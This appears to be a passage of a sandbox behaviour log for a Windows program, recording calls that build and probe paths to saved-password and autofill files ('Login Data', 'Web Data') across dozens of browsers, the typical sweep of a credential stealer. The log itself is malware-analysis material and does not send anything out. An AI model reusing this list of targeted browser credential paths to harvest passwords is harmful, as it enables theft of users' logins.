param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 64 [0134.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f10000 [0134.662] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0134.663] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalTorch\\Login Data") returned 47 [0134.663] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalTorch\\Login Data") returned 0 [0134.664] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalTorch\\Default\\Login Data") returned 55 [0134.665] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0134.666] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 81 [0134.666] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0134.667] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 79 [0134.667] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0134.668] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 62 [0134.668] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0134.669] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 70 [0134.669] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0134.670] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 81 [0134.670] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0134.671] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 79 [0134.672] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0134.673] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 62 [0134.673] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0134.674] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 70 [0134.674] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0134.675] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 75 [0134.675] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0134.676] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 73 [0134.676] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0134.677] LoadLibraryW (lpLibFileName="user32") returned 0x75930000 [0134.677] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 56 [0134.678] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0134.678] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 64 [0134.679] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0134.679] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 68 [0134.680] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0134.681] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 66 [0134.681] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0134.682] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalVivaldi\\Login Data") returned 49 [0134.682] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalVivaldi\\Login Data") returned 0 [0134.683] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalVivaldi\\Default\\Login Data") returned 57 [0134.683] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0134.684] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 76 [0134.684] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0134.685] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 74 [0134.685] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0134.686] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 57 [0134.687] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0134.687] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 65 [0134.688] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0134.689] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 70 [0134.689] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0134.690] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 68 [0134.690] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0134.691] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalSuperbird\\Login Data") returned 51 [0134.691] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalSuperbird\\Login Data") returned 0 [0134.692] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalSuperbird\\Default\\Login Data") returned 59 [0134.692] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0134.693] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 74 [0134.693] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0134.694] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 72 [0134.694] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0134.695] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 55 [0134.696] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0134.696] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 63 [0134.697] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0134.697] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 76 [0134.698] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0134.698] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 74 [0134.699] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0134.700] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalMustang Browser\\Login Data") returned 57 [0134.700] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0134.701] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 65 [0134.701] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0134.702] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 79 [0134.711] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0134.711] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 77 [0134.712] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0134.713] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local360Browser\\Browser\\Login Data") returned 60 [0134.713] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0134.714] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 68 [0134.714] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0134.715] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 81 [0134.715] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0134.716] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 79 [0134.716] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0134.717] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 62 [0134.717] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0134.718] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 70 [0134.719] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0134.719] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 78 [0134.720] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0134.720] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 76 [0134.721] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0134.721] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 59 [0134.722] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0134.723] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 67 [0134.723] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0134.724] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 68 [0134.724] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0134.725] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 66 [0134.725] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0134.726] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalOrbitum\\Login Data") returned 49 [0134.726] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalOrbitum\\Login Data") returned 0 [0134.727] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalOrbitum\\Default\\Login Data") returned 57 [0134.727] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0134.728] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f780 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 68 [0134.729] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0134.730] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 66 [0134.730] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0134.731] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalIridium\\Login Data") returned 49 [0134.731] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalIridium\\Login Data") returned 0 [0134.732] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f77c | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\LocalIridium\\Default\\Login Data") returned 57 [0134.732] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0134.733] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f9f8 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 85 [0134.734] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0134.734] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 83 [0134.735] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Web Data") returned 0 [0134.735] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 66 [0134.736] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera\\Opera Next\\data\\Login Data") returned 0 [0134.736] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 74 [0134.737] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera\\Opera Next\\data\\Default\\Login Data") returned 0 [0134.738] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f9f8 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 91 [0134.738] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Login Data") returned 0 [0134.739] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 89 [0134.739] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Opera Software\\Opera Stable\\User Data\\Default\\Web Data") returned 0 [0134.740] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 72 [0134.740] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data") returned 0 [0134.741] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 80 [0134.741] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Opera Software\\Opera Stable\\Default\\Login Data") returned 0 [0134.742] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f9f8 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 114 [0134.742] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0134.744] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 112 [0134.745] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0134.745] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 95 [0134.746] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0134.746] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 103 [0134.747] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0134.747] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x18f9f8 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 115 [0134.748] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0134.749] wvsprintfW (in: param_1=0x57e458, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 113 [0134.749] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0134.750] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 96 [0134.750] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0134.751] wvsprintfW (in: param_1=0x57e458, param_2="%s%s\\Default\\Login Data", arglist=0x18f9f4 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 104 [0134.751] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0134.752] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x582d08 | out: phkResult=0x582d08*=0x0) returned 0x2 [0134.753] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x57d180 | out: pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local") returned 0x0 [0134.753] wvsprintfW (in: param_1=0x57e458, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0x18fba8 | out: param_1="C:\\Users\\kFT6uTQW\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 71 [0134.754] PathFileExistsW (pszPath="C:\\Users\\kFT6uTQW\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0135.588] __aulldvrm () [0135.589] __aulldvrm () [0135.590] __aulldvrm () [0135.592] __aulldvrm () [0135.593] __aulldvrm () [0135.594] __aulldvrm () [0135.595] __aulldvrm () [0135.596] __aulldvrm () [0135.597] __aulldvrm () [0135.598] __aulldvrm () [0135.599] __aulldvrm () [0135.600] __aulldvrm () [0135.601] __aulldvrm () [0135.602] __aulldvrm () [0135.603] __aulldvrm () [0135.604] __aulldvrm () [0135.605] __aulldvrm () [0135.606] __aulldvrm () [0135.607] __aulldvrm () [0135.608] __aulldvrm () [0135.609] __aulldvrm () [0135.610] __aulldvrm () [0135.611] __aulldvrm () [0135.612] __aulldvrm () [0135.613] __aulldvrm () [0135.614] __aulldvrm () [0135.615] __aulldvrm () [0135.616] __aulldvrm () [0135.617] __aulldvrm () [0135.618] __aulldvrm () [0135.619] __aulldvrm () [0135.620] __aulldvrm () [0135.621] __aulldvrm () [0135.622] 